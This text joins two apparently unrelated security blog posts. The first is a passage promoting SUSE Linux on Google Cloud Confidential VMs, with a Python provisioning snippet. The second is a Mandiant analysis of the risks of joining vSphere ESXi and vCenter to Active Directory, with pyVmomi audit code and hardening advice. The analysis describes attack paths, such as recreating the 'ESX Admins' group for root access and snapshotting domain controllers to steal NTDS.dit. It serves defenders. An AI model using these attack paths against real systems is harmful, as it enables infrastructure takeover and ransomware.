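# The project, zone, and SLES image path below are illustrative placeholders.
from google.cloud import compute_v1

def create_tdx_confidential_vm(project: str, zone: str, name: str) -> str:
    instance = compute_v1.Instance(
        name=name,
        machine_type=f"zones/{zone}/machineTypes/c3-standard-4",
        # Request the Intel TDX Trusted Execution Environment.
        confidential_instance_config=compute_v1.ConfidentialInstanceConfig(
            confidential_instance_type="TDX",
        ),
        # Confidential VMs terminate (rather than live-migrate) on maintenance.
        scheduling=compute_v1.Scheduling(on_host_maintenance="TERMINATE"),
        disks=[
            compute_v1.AttachedDisk(
                boot=True,
                auto_delete=True,
                initialize_params=compute_v1.AttachedDiskInitializeParams(
                    # Hypothetical image family; consult SUSE's image listings.
                    source_image="projects/suse-cloud/global/images/family/sles-15",
                ),
            )
        ],
        network_interfaces=[
            compute_v1.NetworkInterface(network="global/networks/default")
        ],
    )
    op = compute_v1.InstancesClient().insert(
        project=project, zone=zone, instance_resource=instance
    )
    op.result()  # Block until the create operation completes.
    return name
```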
At Google Cloud, we strongly advocate for a layered approach to security. Here, SUSE Linux Enterprise Server (SLES) strengthens the guest OS layer, while Confidential VMs strengthen the infrastructure layer. Additionally, the comprehensive SLES security portfolio can help support compliance, risk mitigation, and cybersecurity best practices:
Meeting compliance requirements: SLES is designed to help organizations meet regulatory requirements through its security features. SLES comes with Federal Information Processing Standards (FIPS) 140-3 certified cryptographic modules.
Reducing evaluation effort: Utilizing SLES with supplier certifications can help customers streamline their evaluation processes by referencing existing certifications.
Hardening automatically: SLES includes an automated hardening process that can help with Security Technical Implementation Guide (STIG)-compliant hardening during setup with YAST or AutoYAST, which can be adjusted as needed.
The combination of SLES within Google Cloud Confidential VMs can offer several benefits:
Complementing encryption with a secure OS: With its security focus and certifications, SLES can provide a hardened operating system in a trusted environment, making both applications and the OS less susceptible to vulnerabilities.
Supporting integrity and trustworthiness: Customers can have greater confidence that both the hardware and the operating system are working as expected. Confidential VMs offer remote attestation, allowing verification of the VM identity and state. Running a secure OS, such as SLES, on an attested Confidential VM can support overall data and code integrity.
Supporting Confidential Computing technologies: By providing a consistent and secure operating system across all Google Cloud Confidential Computing types (AMD SEV, AMD SEV-SNP, and Intel TDX), SLES can help simplify the deployment and management of sensitive cloud workloads.
Enhancing compliance in sensitive environments: For workloads that require a notable level of data protection due to compliance regulations, this joint security solution of SLES on Confidential VMs can help alleviate cloud migration concerns from internal auditors.
Addressing internal and external threats: While Confidential Computing primarily can help protect against external threats like hypervisors, running a security-focused OS like SLES in a Confidential VM can offer an additional layer of protection against potential internal vulnerabilities in the guest OS itself.
Reinforcing data ownership and control: Confidential Computing can help provide technical assurances that you have retained control and effective ownership of your data, even when your data is processed in the cloud. By encrypting data in use and limiting access to only your authorized workloads within a TEE, you can gain stronger assurances for your digital sovereignty.
Extending Zero Trust to execution: By encrypting data in memory on the CPU, this solution extends the Zero Trust principle of “never trust, always verify” to data even when it’s actively being processed. This ensures data remains secure and encrypted throughout its lifecycle, including during execution, helping to enforce a real Zero Trust environment.
Establishing a secure foundation for cloud-native workloads: With SLES providing a secure base and Google Cloud Confidential VMs offering hardware-level protection, this environment together with SUSE Cloud Native solutions can deliver a robust foundation for your most sensitive cloud-native applications. By securing the underlying compute resources, you can extend data-in-use protection to higher level containerized and cloud-native workloads.
Organizations can confidently move regulated and confidential applications to Google Cloud, knowing their data is protected throughout its lifecycle, including while in use, and backed by a secure guest OS, bolstering their digital sovereignty.
Broadcom’s VMware vSphere product remains a popular choice for private cloud virtualization, underpinning critical infrastructure. Far from fading, organizations continue to rely heavily on vSphere for stability and control. We’re also seeing a distinct trend where critical workloads are being repatriated from public cloud services to these on-premises vSphere environments, influenced by strategies like bimodal IT and demands for more operational oversight.
The common practice of directly integrating vSphere with Microsoft Active Directory (AD), while simplifying administration tasks, creates an attack path whose risks are frequently underestimated. This configuration extends the AD attack surface directly to the hypervisor. From a threat actor’s perspective, the integration is a high-value opportunity: it turns the relatively common task of compromising AD credentials into privileged administrative control over ESXi hosts and vCenter, and ultimately complete command of the virtualized infrastructure.
Ransomware aimed at vSphere infrastructure, including both ESXi hosts and vCenter Server, poses a uniquely severe risk due to its capacity for immediate and widespread infrastructure paralysis. With the end of general support for vSphere 7.x approaching in October 2025—the version Mandiant has observed running in the large majority of organizations—the threat of targeted ransomware has become urgent. As recovering from such an attack requires substantial time and resources, proactive defense is paramount. It is therefore critical for organizations to understand the specific threats against these core components and implement effective, unified countermeasures to prevent their compromise, especially before support deadlines introduce additional risk.
This blog post breaks down the inherent risks of, and misunderstandings about, integrating vSphere with Microsoft AD. Drawing on Mandiant’s deep experience with vSphere ransomware incidents and proactive assessments of both AD and vSphere, we provide direction for understanding the risk and strengthening security posture against the threats facing enterprise vSphere management today.
To understand the security risks in a vSphere environment, it’s essential to understand its architecture. A compromise at one layer can have cascading effects throughout the entire virtualized environment.
At its core, vSphere is a platform that pools physical datacenter resources like compute, storage, and networking into a flexible layer of virtual infrastructure, a task primarily accomplished by two key components, ESXi and vCenter, as shown in the following diagram:
ESXi (The Hypervisor): This is the foundational layer of vSphere. ESXi is a bare metal hypervisor, meaning it installs directly onto the physical server hardware without requiring an underlying operating system. Its core job is to partition that server into multiple, isolated virtual machines (VMs). Each VM, which is essentially just a collection of files, runs its own operating system and applications, acting like an independent computer. The hypervisor’s minimal design is intentional, aiming to reduce its own attack surface while efficiently managing the server’s resources.
vCenter (The Control Plane): If ESXi hosts are the workers, the vCenter Server is the “brain” or control plane for the entire environment. It provides a single web-based interface to manage all connected ESXi hosts and the VMs they run. ESXi hosts are registered with vCenter, which uses agents on each host to manage operations and enable advanced features like automatic workload balancing and high availability for failover protection.
Integrating vSphere with AD creates a flexible environment that simplifies identity management, yet it introduces profound security risks. This direct link can turn an AD compromise into a significant threat against the entire vSphere deployment.
An Outdated Blueprint: Re-examining Foundational vSphere Security
Virtualization has been a cornerstone of enterprise IT for nearly two decades, solving server sprawl and delivering transformative operational agility. Alongside it, AD remains a pillar of enterprise IT. This has led to a long-standing directive that all enterprise technology, including critical infrastructure like vSphere, must integrate with AD for centralized authentication. The result is a risky dependency—the security of foundational infrastructure is now directly tied to the security of AD, meaning any compromise within AD becomes a direct threat to the entire virtualization environment.
In the past, vSphere security was often approached in distinct, siloed layers. Perimeter security was stringent, and threats were typically viewed as internal, such as configuration errors, rather than from external threat actors. This, combined with the newfound ease of image-based backups, often led to security efforts becoming primarily focused on robust business continuity and disaster recovery capabilities over proactive defense. As environments expanded, managing local user accounts created significant administrative overhead, so support for AD integration was introduced for centralized identity management.
Mandiant’s observation, based on extensive incident response engagements, is that many vSphere environments today still operate on this foundational architecture, carrying forward security assumptions that haven’t kept pace with the evolving threat landscape. As Mandiant’s assessments frequently identify, these architectures often prioritize functionality and stability over a security design grounded in today’s threats.
So what’s changed? Reliance solely on perimeter defenses is an outdated security strategy. The modern security boundary focuses on the user and device, typically protected by agent-based EDR solutions. But here lies the critical gap: the ESXi hypervisor is a purpose-built appliance and, contrary to what many people believe, not a standard Linux distribution. This specialized architecture inherently prevents the installation of external software, including security tools like EDR agents. vSphere documentation explicitly addresses this, stating:
“The ESXi hypervisor is a specialized, purpose-built solution, similar to a network router’s firmware. While this approach has several advantages, it also makes ESXi unable to run “off-the-shelf” software, including security tools, designed for general-purpose operating systems as the ESXi runtime environment is dissimilar to other operating systems.
The use of Endpoint Detection and Response (EDR) and other security practices inside third-party guest operating systems is supported and recommended.”
Consequently, most organizations focus their security efforts and EDR deployment inside the guest operating systems. This leaves the underlying ESXi hypervisor—the foundation of the entire virtualization environment—as a significant blind spot for security teams.
The vSphere Threat Landscape
The security gap at the hypervisor layer, which we detailed in the previous section, has not gone unnoticed by threat actors. As security for Windows-based operating systems matured with advanced EDR solutions, threat actors have pivoted to a softer, higher-value target—the ESXi hypervisor itself.
This pivot is amplified by common operational realities. The critical role of ESXi hosts often leads to a hesitancy to apply patches promptly for fear of disruption. Many organizations face a rapidly closing window to mitigate risks; however, threat actors aren’t just relying on unpatched vulnerabilities. They frequently leverage compromised credentials, a lack of MFA, and simple misconfigurations to gain access.
The Rise of Hypervisor-Aware Ransomware
Ransomware targeting vSphere is fundamentally more devastating than its traditional Windows counterpart. Instead of encrypting files on servers or end user compute, these attacks aim to cripple the entire infrastructure by encrypting virtual disk files (VMDKs), disabling dozens of VMs at once.
This is not a theoretical threat. According to Google Threat Intelligence Group (GTIG), the focus on vSphere is rapidly increasing. Of the new ransomware families observed, the proportion specifically tailored for vSphere ESXi systems grew from ~2% in 2022 to over 10% in 2024. This demonstrates a clear and accelerating trend that threat actors are actively dedicating resources to build tooling that specifically targets the hypervisor. In incidents investigated by GTIG, threat actors most frequently deployed REDBIKE, RANSOMHUB, and LOCKBIT.BLACK variants.
GTIG analysts have also noted a recent trend of threat actors gaining persistence in vSphere environments via reverse shells deployed on vCenter. This provides a foothold within the vSphere control plane and thus complete control over all infrastructure. It typically manifests in a two-pronged approach: tactical data exfiltration, such as the AD database (NTDS.dit), followed by the deployment of ransomware and mass encryption of all VMs.
Understanding the Active Directory Integration in vSphere
The decision to integrate vSphere with AD often overlooks the specifics of how this connection actually works. To properly assess the risk, we must look beneath the surface at the technical components that enable this functionality. This analysis will deconstruct those key pieces: the legacy agent responsible for authentication, its inherent inability to support modern security controls like multi-factor authentication (MFA), and the insecure default trust relationships it establishes. By examining these foundational mechanisms, we can expose the direct line from a credential compromise to an infrastructure takeover.
vSphere’s Likewise Agent
When discussing vSphere’s integration with AD, it’s essential to distinguish between two separate components: vCenter Server and the ESXi hosts. Their respective AD integration options are independent and possess different capabilities. This connection is entirely facilitated by the Likewise agent.
The Likewise agent was originally developed by Likewise Software to allow Linux and Unix-based systems to join AD environments, enabling centralized identity management using standard protocols like Kerberos, NTLM, and LDAP/(S). The open-source edition, Likewise Open, included tools such as domainjoin-cli and system daemons like lsassd, which are still found under the hood in ESXi and the vCenter Server Appliance (VCSA). vSphere embedded this agent starting with ESX 4.1 (released in 2010) to facilitate Integrated Windows Authentication (IWA). However, its function differs:
In ESXi, the Likewise agent actively handles AD user authentication when configured.
In vCenter, it is only used for the initial domain join when Integrated Windows Authentication (IWA) is selected as the identity source—all actual authentication is then handled by the vCenter Single Sign-On (SSO) subsystem.
The original Likewise Software was eventually absorbed by BeyondTrust, and the open-source edition of the agent is no longer actively maintained publicly. The Likewise OSS project is now archived and marked as inactive. It is understood the codebase is only maintained internally. Note: The agent’s build version remains identical at Likewise Version 6.2.0 across both ESXi 7 and 8.
Figure 1: ESXi Likewise Agent versions
The following table compares the native AD connection methods for vCenter and ESXi.

| Feature / Capability | ESXi Host | vCenter Server (VCSA) |
| --- | --- | --- |
| AD integration method | Integrated Windows Authentication (IWA) only | IWA, LDAP/LDAPS, and federated identity (SAML, OIDC) |
| Likewise agent used | Yes – exclusively for IWA domain join and authentication | Yes – used for IWA domain join only |
| Authentication protocols supported | Kerberos (via IWA only) | Kerberos (IWA), LDAP(S), SAML, OIDC |
| Modern auth support (OIDC, SAML, FIDO2) | Not supported | Not supported via AD; supported only when using federated IdPs |
| MFA support | Not supported | Not supported via AD DS; supported via identity federation (ADFS, Azure AD, etc.) |
| Granular role-based access control (RBAC) | Limited (via host profiles or CLI only) | Advanced RBAC with vCenter SSO |
Why Not to Use Likewise-Based AD Integration (ESXi/vCenter)
The following list contains considerations when using AD-based connections managed by the vSphere Likewise agent:
Deprecated software: Likewise is legacy software, no longer maintained or supported upstream.
No support for modern authentication: Likewise only supports Integrated Windows Authentication (Kerberos) and offers no support for SAML, OIDC, or FIDO2.
No MFA: Likewise cannot enforce contextual policies such as MFA, geolocation restrictions, or time-based access.
Credential material stored locally: Kerberos keytabs and cached credentials are stored unencrypted on disk.
VMware recommends leveraging identity federation with modern identity providers, bypassing the limitations of the legacy Likewise-based stack. Broadcom announced on March 25 that IWA will be removed in the next major release.
The MFA Gap
While AD integration offers administrative convenience, it introduces significant security limitations, particularly regarding MFA. Traditional AD authentication methods, including Kerberos and NTLM, are inherently single-factor. These protocols do not natively support MFA, and the vCenter Likewise integration does not extend AD MFA enforcement to vCenter or ESXi.
Critically, ESXi does not support MFA in any form, nor does it support identity federation, SAML, or modern protocols such as OIDC or FIDO2. Even for vCenter, MFA can only be applied to users within the vSphere.local domain (using mechanisms like RSA SecurID or RADIUS), but not to AD-joined users authenticated through IWA or LDAP/S.
Ancillary solutions can offer proxy-based MFA that integrates with AD to enforce MFA for vSphere. AuthLite extends the native AD login process by requiring a second factor during Windows authentication, which can indirectly secure vCenter access when Integrated Windows Authentication is used. Silverfort operates at the domain controller level, enforcing MFA on authentication flows in real time without requiring agents on endpoints or changes to vCenter. Both solutions can help enforce MFA in vSphere environments that lack native support for it, but they also introduce caveats: added complexity, potential authorization loops if AD becomes dependent on the same infrastructure they protect, and the need to treat their control planes or virtual appliances as Tier 0 systems within the vSphere environment.
As a result, in organizations that integrate vSphere with traditional Active Directory, all access to critical vSphere infrastructure (ESXi and vCenter) remains protected by a password alone, with no MFA.
While it is technically possible to enforce MFA in vSphere through Active Directory Federation Services (ADFS), this approach requires careful consideration. It is important to note that ADFS is still a feature included in Windows Server 2025 and is not on any official deprecation list with an end-of-life date. However, the lack of significant new feature development compared to the rapid innovation in Microsoft Entra ID speaks to its status as a legacy technology. This is underscored by the extensive migration resources Microsoft now provides to move applications away from AD FS and into Entra ID.
Therefore, while ADFS remains a supported feature, for the purposes of securing vSphere it is a complex workaround that doesn’t apply to direct ESXi access and runs contrary to Microsoft’s clear strategic direction toward modern, cloud-based identity solutions.
Another common approach involves Privileged Access Management (PAM). While a PAM-centric strategy offers benefits like centralized control and session auditing, several caveats warrant consideration. PAM systems add operational complexity, and the vCenter session itself is typically not directly federated with the primary enterprise identity provider (like Entra ID or Okta). Consequently, context-aware conditional access policies are generally applied only at the initial PAM logon, not within the vCenter session itself.
Ultimately, these workarounds do not address the core issue: vSphere’s reliance on the Likewise agent and traditional AD protocols prevents native MFA enforcement for AD users, leaving the environment vulnerable.
There is a reliance on a delegated logon based on AD password complexity, and any MFA would have to be at the network access layer or workstation login, not at the vCenter login prompt for those users.
The ‘ESX Admins’ Problem Is Not an ESXi Issue, It’s a Trust Issue
In July 2024, Microsoft published a blog post on CVE-2024-37085, an “ESXi vulnerability” that was considered a critical issue, and one that vSphere promptly addressed in a patch release. The CVE, present in vSphere ESXi for many years, involved several ESXi advanced settings utilizing insecure default configurations. Upon joining an ESXi host to an AD domain, the “ESX Admins” AD group is automatically granted an ESXi Admin role, potentially expanding the scope of administrative access beyond the intended users.
These settings are configured by the following ESXi advanced controls:
Config.HostAgent.plugins.hostsvc.esxAdminsGroupAutoAdd
What it does: Controls whether users from a designated administrators group are automatically added to the host’s local administrative group.
Config.HostAgent.plugins.vimsvc.authValidateInterval
What it does: Defines the time interval at which the host’s management services validate the authentication credentials (or tickets) of connected clients.
Config.HostAgent.plugins.hostsvc.esxAdminsGroup
What it does: Specifies the name (or identifier) of the group whose members are automatically considered for host administrative privileges (when auto-add is enabled by the first setting).
On earlier releases, the insecure defaults can be hardened manually by changing:
Config.HostAgent.plugins.hostsvc.esxAdminsGroupAutoAdd from true to false
Config.HostAgent.plugins.vimsvc.authValidateInterval from 1440 to 90
Config.HostAgent.plugins.hostsvc.esxAdminsGroup from “ESX Admins” to “”
vSphere ESXi 8.0 Update 3 changed these default settings as follows:
Config.HostAgent.plugins.hostsvc.esxAdminsGroupAutoAdd from true to false
Config.HostAgent.plugins.vimsvc.authValidateInterval from 1440 to 90
Config.HostAgent.plugins.hostsvc.esxAdminsGroup no change (“ESX Admins”)
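As a rough, unofficial illustration of auditing these values at scale, the following pyVmomi sketch queries each host’s advanced options. The vCenter address and credentials are placeholders, and the hardened values mirror the list above:

```python
# Minimal sketch: audit the 'ESX Admins'-related settings on every ESXi host.
# The vCenter hostname and credentials below are placeholders.
import ssl
from pyVim.connect import SmartConnect, Disconnect
from pyVmomi import vim

HARDENED = {
    "Config.HostAgent.plugins.hostsvc.esxAdminsGroupAutoAdd": False,
    "Config.HostAgent.plugins.hostsvc.esxAdminsGroup": "",
    "Config.HostAgent.plugins.vimsvc.authValidateInterval": 90,
}

si = SmartConnect(host="vcenter.example.com", user="audit@vsphere.local",
                  pwd="...", sslContext=ssl._create_unverified_context())
try:
    content = si.RetrieveContent()
    # Enumerate every ESXi host managed by this vCenter.
    view = content.viewManager.CreateContainerView(
        content.rootFolder, [vim.HostSystem], True)
    for host in view.view:
        adv = host.configManager.advancedOption
        for key, want in HARDENED.items():
            have = adv.QueryOptions(key)[0].value
            status = "OK" if have == want else "REVIEW"
            print(f"{host.name}: {key} = {have!r} [{status}]")
    view.Destroy()
finally:
    Disconnect(si)
```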
Integrating an ESXi host with Microsoft AD introduces a fundamental security issue that is often overlooked—the IdP’s administrators effectively gain administrative control over the ESXi host and any other system relying on that trust. While a common perception, sometimes reinforced by narratives focusing on the endpoint, suggests the ESXi host itself is the primary vulnerability, the more critical security concern is the implicit, far-reaching administrative power wielded by the administrators of the trusted IdP, particularly when using AD authentication with ESXi.
Administrators of Active Directory implicitly become administrators of any ESXi host that trusts it.
Consequently, neither workarounds nor configuration fixes, which only adjust default settings, resolve this core problem when an ESXi host is joined to AD. The issue transcends specific CVEs; it stems from the inherent security implications of the implicit trust model itself, particularly when it involves systems like ESXi and AD, which already possess their own security vulnerabilities and are frequent targets for threat actors.
For ESXi specifically, consider the following:
Automatic full administrative access: When ESXi hosts are joined to AD, a default (or custom configured) AD group (e.g., “ESX Admins”) is granted full root-level administrative privileges on the ESXi hosts. Any member of this AD group instantly gains unrestricted control of the ESXi host.
Group name: If AD is compromised, threat actors can manipulate any group name configured via the Config.HostAgent.plugins.hostsvc.esxAdminsGroup advanced setting; this is not limited to the group name “ESX Admins.”
Lack of security identifier (SID) tracking: AD group names (not limited to “ESX Admins”) added to ESXi are not tracked by their SIDs. A threat actor could therefore delete and recreate (or rename) an AD group such as “ESX Admins”, keep the same name referenced in ESXi via Config.HostAgent.plugins.hostsvc.esxAdminsGroup, and retain the elevated privileges. This is a limitation of the Likewise ESXi agent.
Active Directory group management: A threat actor looking to access a domain-joined ESXi host simply requires sufficient permissions to add themselves to the AD group defined via Config.HostAgent.plugins.hostsvc.esxAdminsGroup.
Recent discussions around vulnerabilities like CVE-2024-37085 have brought this security issue to the forefront: the inherent dangers of joining vSphere ESXi hosts directly to an AD domain. While such integration offers perceived management convenience, it establishes a level of trust that can be easily exploited.
Why Your ESXi Hosts Should Never Be Active Directory Domain Joined
Based on the previous discussion, we can confidently establish that joining an ESXi host to AD carries substantial risk. The risk is compounded in the absence of comprehensive ESXi security controls such as Secure Boot, TPM, execInstalledOnly, vCenter integration, comprehensive logging, and SIEM integration. Compromised AD credentials tied to an ESXi-joined group allow remote threat actors to readily exploit the elevated privileges, executing actions such as virtual machine shutdown and ransomware deployment via SSH. These risks can be summarized as follows:
No MFA support: ESXi does not support MFA for AD users. Domain joining exposes critical hypervisor access to single-factor password-based authentication.
Legacy authentication protocols: ESXi relies on IWA and Kerberos / NTLM / Windows Session Authentication (SSPI)—outdated protocols vulnerable to various attacks, including pass-the-hash and credential relay.
Likewise agent is deprecated: The underlying Likewise agent is a discontinued open-source project. Continued reliance on it introduces maintenance and security risks.
No modern authentication integration: ESXi does not support federated identity, SAML, OIDC, FIDO2, or conditional access.
AD policy enforcement is absent: Group Policy Objects (GPOs), conditional access, and login time restrictions do not extend to ESXi via AD join, undermining centralized security controls.
Complexity without benefit: Domain joining adds administrative overhead without offering meaningful security gains — especially when using vCenter as the primary access point.
Limited role mapping granularity: Group-based role mappings on ESXi are basic and cannot match the RBAC precision available in vCenter, reducing access control fidelity.
To securely remove ESXi hosts from AD, a multistep process is required to shift access management explicitly to vCenter. This involves assessing current AD usage, designing granular vCenter roles, configuring vCenter’s RBAC, removing hosts from the domain via PowerCLI, and preventing future AD re-integration. All management then moves to vCenter, with direct ESXi access minimized. This comprehensive approach prioritizes security and efficiency by moving away from AD reliance for ESXi authentication and authorization towards a vCenter-centric, granular RBAC model. vSphere explicitly discourages joining ESXi hosts to AD:
“ESXi can be joined to an Active Directory domain as well, and that functionality continues to be supported. We recommend directing all configuration & usage through the Role-Based Access Controls (RBAC) present in vCenter Server, though.”
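As a hedged sketch of the assessment step (reusing the pyVmomi connection and container-view pattern from the earlier example), the following reports which hosts remain domain joined:

```python
# Minimal sketch: flag ESXi hosts that are still joined to an AD domain.
# Reuses the pyVmomi connection/view pattern from the earlier sketch.
from pyVmomi import vim

def report_domain_joined_hosts(content):
    view = content.viewManager.CreateContainerView(
        content.rootFolder, [vim.HostSystem], True)
    for host in view.view:
        auth = host.configManager.authenticationManager
        for store in auth.info.authConfig:
            # ActiveDirectoryInfo entries describe the host's AD membership.
            if isinstance(store, vim.host.ActiveDirectoryInfo) and store.enabled:
                print(f"{host.name}: joined to {store.joinedDomain} "
                      f"({store.domainMembershipStatus})")
    view.Destroy()
```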
vSphere vCenter Server represents a strategic objective for threat actors due to its authoritative role as the centralized management for virtualized infrastructure. A compromised vCenter instance effectively cedes comprehensive administrative control over the entire virtual estate, encompassing all connected ESXi hypervisors, virtual machines, datastores, and virtual network configurations.
Through its extensive Application Programming Interfaces (APIs), adversaries can programmatically manipulate all managed ESXi hosts and their resident virtual machines, enabling actions such as mass ransomware deployment, large-scale data exfiltration, the provisioning of rogue virtual assets, or the alteration of security postures to evade detection and induce widespread operational disruption.
Furthermore, the vCenter Server appliance itself can be subverted by implanting persistent backdoors, thereby establishing covert command-and-control (C2) channels that allow for entrenched persistence and continued malicious operations. Consequently, its critical function renders vCenter a high-value target. The following should be considered:
Coupled security dependency (compromise amplification risk): Directly linking vCenter to AD makes vSphere security dependent on AD’s integrity. As AD is a prime target, compromising privileged AD accounts mapped to vCenter grants immediate, potentially unrestricted administrative access to the virtual infrastructure, bypassing vSphere-specific security layers. Insufficient application of least privilege for AD accounts in vSphere magnifies this risk.
Single-factor authentication weakness (credential compromise risk): Relying solely on AD password validation makes vCenter highly vulnerable to common credential compromise methods (phishing, brute-force, spraying, stuffing, malware). Without mandatory MFA, a single stolen password for a privileged AD account allows complete authentication bypass, enabling unauthorized access, data breaches, ransomware, or major disruptions.
Lack of native MFA: The direct vsphere.local-to-AD integration offers no built-in enforcement of strong authentication like phishing-resistant FIDO2. While compatibility exists for external systems (Smart Cards, RSA SecurID), these require separate, dedicated infrastructure and are not inherent features, leaving a significant authentication assurance gap if unimplemented.
Facilitation of lateral movement and privilege escalation: Compromised AD credentials, even non-administrative ones with minimal vSphere rights, allow threat actors initial vCenter access. vCenter can then be exploited as a pivot point for further network infiltration, privilege escalation within the virtual environment, or attacks on guest systems via console/API access, all stemming from the initial single-factor credential compromise.
Integrating vSphere vCenter directly with AD for identity management, while common, inherently introduces significant security vulnerabilities stemming from coupled dependencies, reliance on single-factor authentication, a lack of native strong MFA, and facilitated attack pathways. These not only critically expose the virtual infrastructure but also provide avenues to exploit the VCSA appliance’s attack surface, such as its underlying Linux shell and the lack of comprehensive endpoint detection and response (EDR) capabilities.
Securing vSphere: The Tier 0 Challenge
The widespread practice of running Tier 0 services—most critically, AD domain controllers (often used for direct Identity integration)—directly on vSphere hypervisors introduces a significant and often overlooked security risk. By placing Active Directory Domain Controllers on vSphere, any successful attack against the hypervisor effectively hands threat actors the keys to the entire AD environment, enabling complete domain takeover. Mandiant observes that a general lack of awareness and proactive mitigation persists.
The danger is significant and present even for vSphere permissions that appear low-risk or are operationally common. For example, the privilege to snapshot an AD virtual machine can be weaponized for complete AD takeover. This specific vSphere capability, often assigned for backup routines, enables offline NTDS.dit (AD database) exfiltration. This vSphere-level action renders many in-guest Windows Server security controls ineffective, bypassing not only traditional measures like strong passwords and MFA, but also advanced protections such as LSASS credential guard and EDR, which primarily monitor activity within the operating system. This effectively paves a direct route to full domain compromise for a threat actor possessing this specific permission.
Mandiant has observed these tactics, techniques, and procedures (TTPs) attributed to various ransomware groups across multiple incidents. The absence of VM encryption and logging makes obtaining the AD database a relatively simple task that can go undetected.
The following table contains a list of sample threats matched to related permissions:

| Threat | Risk | Minimum vSphere Permission Required |
| --- | --- | --- |
| Unencrypted vMotion | Memory-in-transit (e.g., LSASS, krbtgt hashes) can be captured during migration. | Role: Virtual Machine Power User or higher. Permission: Host > Inventory > Migrate powered on virtual machine |
| Unencrypted VM disks | AD database (NTDS.dit), registry hives, and password hashes can be stolen from VMDKs. | Role: Datastore Consumer, VM Admin or higher. Permission: Datastore > Browse, Datastore > Low level file operations |
| Snapshot creation | Snapshots preserve memory and disk state; can be used to extract in-memory credentials. | Role: Virtual Machine Power User or higher. Permission: Virtual Machine > State > Create Snapshot |
| Mounting a VMDK to another VM | Enables offline extraction of AD secrets (e.g., NTDS.dit, registry, SYSVOL). | Role: VM Admin or custom with disk-level access. Permission: Virtual Machine > Configuration > Add existing disk, Datastore > Browse |
| Exporting / cloning a VM | Enables offline AD analysis, allowing credential extraction or rollback attacks. | |
Delegation of trust from vSphere vCenter to AD grants implicit administrator privileges on the trusted systems to any AD domain administrator. This elevates the risk profile of AD compromise, impacting the entire infrastructure. To mitigate this, implement a two-pronged strategy: first, create a separate, dedicated vSphere environment specifically for the most critical Tier 0 assets, including AD. This isolated environment should be physically or logically separated from other systems and highly secured with robust network segmentation. Second, implement a zero-trust security model for the control plane of this environment, verifying every access request regardless of source. Within this isolated environment, deploy a dedicated “infrastructure-only” IdP (on-premises or cloud). Implementing the principle of least privilege is paramount.
A dedicated, isolated vSphere environment for Tier 0 assets (e.g., Active Directory) should have strictly limited administrative access (via a privileged access workstation, or PAW), granting permissions only to those directly managing the infrastructure. This significantly reduces the impact of a breach by preventing lateral movement and minimizing damage. Unnecessary integrations should be avoided to maintain the environment’s security and adhere to the least-privilege model.
To effectively safeguard critical Tier 0 assets operating within the vSphere environment–specifically systems like Privileged Access Management (PAM), Security Information and Event Management (SIEM) virtual appliances, and any associated AD tools deployed as virtual appliances–a multilayered security approach is essential. These assets must be treated as independent, self-sufficient environments. This means not only isolating their network traffic and operational dependencies but also, critically, implementing a dedicated and entirely separate identity provider (IdP) for their authentication and authorization processes. For the highest level of assurance, these Tier 0 virtual machines should be hosted directly on dedicated physical servers. This practice of physical and logical segregation provides a far greater degree of separation than shared virtualized environments.
The core objective here is to break the authorization dependency chain, ensuring that credentials or permissions compromised elsewhere in the network cannot be leveraged to gain access to these Tier 0 systems. This design creates defense in depth security barriers, fundamentally reducing the likelihood and impact of a complete system compromise.
Conclusion
Mandiant has observed that threat actors are increasingly targeting vSphere, not just for ransomware deployment, but also as a key avenue for data exploitation and exfiltration. This shift is demonstrated by recent threat actor activity observed by GTIG, where adversaries have leveraged compromised vSphere environments to exfiltrate sensitive data such as AD databases before or alongside ransomware execution.
As this document has detailed, the widespread reliance on vSphere, coupled with often underestimated risks inherent in its integration with AD and the persistence of insecure default configurations, creates a dangerously vulnerable landscape. Threat actors are not only aware of these weaknesses but are actively exploiting them with sophisticated attacks increasingly targeting ESXi and vCenter to achieve maximum impact.
The usability and stability that make vSphere a foundational standard for on-premises and private clouds can be misleading; they do not equate to inherent security. The evolution of the threat landscape, particularly the direct targeting of the hypervisor layer, which bypasses traditional endpoint defenses, necessitates a fundamental shift in how vSphere security is approached. Relying on outdated practices, backups, perimeter defenses alone, or assuming EDR on guest VMs provides sufficient protection for the underlying infrastructure creates significant security gaps and exposes an organization to severe risks.
Identity integration vulnerabilities will be exploited; therefore, organizations are strongly urged to immediately assess their vSphere environment’s AD integration status and decisively prioritize the implementation of the mitigation strategies outlined in this document. This proactive stance is crucial to effectively counter modern threats and includes:
Decoupling critical dependencies: Severing direct ESXi host integration with AD is paramount to shrinking the AD attack surface.
Modernizing authentication: Implementing robust, phishing-resistant MFA for vCenter, preferably via identity federation with modern IdPs, is no longer optional but essential.
Systematic hardening: Proactively addressing the insecure defaults for ESXi and vCenter, enabling features like execInstalledOnly, Secure Boot, TPM, Lockdown Mode, and configuring stringent firewall rules (a verification sketch follows this list).
Enhanced visibility: Implementing comprehensive remote logging for both ESXi and vCenter, feeding into a SIEM with use cases specifically designed to detect hypervisor-level attacks.
Protecting Tier 0 assets: Strategically isolating critical workloads like Active Directory Domain Controllers in dedicated, highly secured vSphere environments with strict, minimized access controls and encrypted VMs and vMotion.
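The verification sketch referenced above, following the same pyVmomi pattern as the earlier examples, might spot-check two of these controls per host. VMkernel.Boot.execInstalledOnly is a standard ESXi advanced option, but verify the key name against your release:

```python
# Minimal sketch: spot-check execInstalledOnly and Lockdown Mode per host.
# Follows the pyVmomi connection/view pattern from the earlier sketches.
from pyVmomi import vim

def hardening_report(host: vim.HostSystem) -> None:
    adv = host.configManager.advancedOption
    exec_only = adv.QueryOptions("VMkernel.Boot.execInstalledOnly")[0].value
    # lockdownMode is e.g. 'lockdownDisabled', 'lockdownNormal', 'lockdownStrict'.
    lockdown = host.config.lockdownMode
    print(f"{host.name}: execInstalledOnly={exec_only}, lockdownMode={lockdown}")
```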
The upcoming end-of-life for vSphere 7 in October 2025 means that vast numbers of organizations will no longer receive product support, security patches, or updates for a product that underpins their infrastructure. This presents a critical juncture for organizations and a perfect storm for threat actors. The transition away from vSphere 7 should be viewed as a key opportunity to re-architect for security, not merely a routine upgrade to implement new features and obtain support. Failure to proactively address these interconnected risks by implementing these recommended mitigations will leave organizations exposed to targeted attacks that can swiftly cripple their entire virtualized infrastructure, leading to operational disruption and financial loss. The time to adopt a resilient, defense-in-depth security posture to protect these critical vSphere environments is unequivocally now.
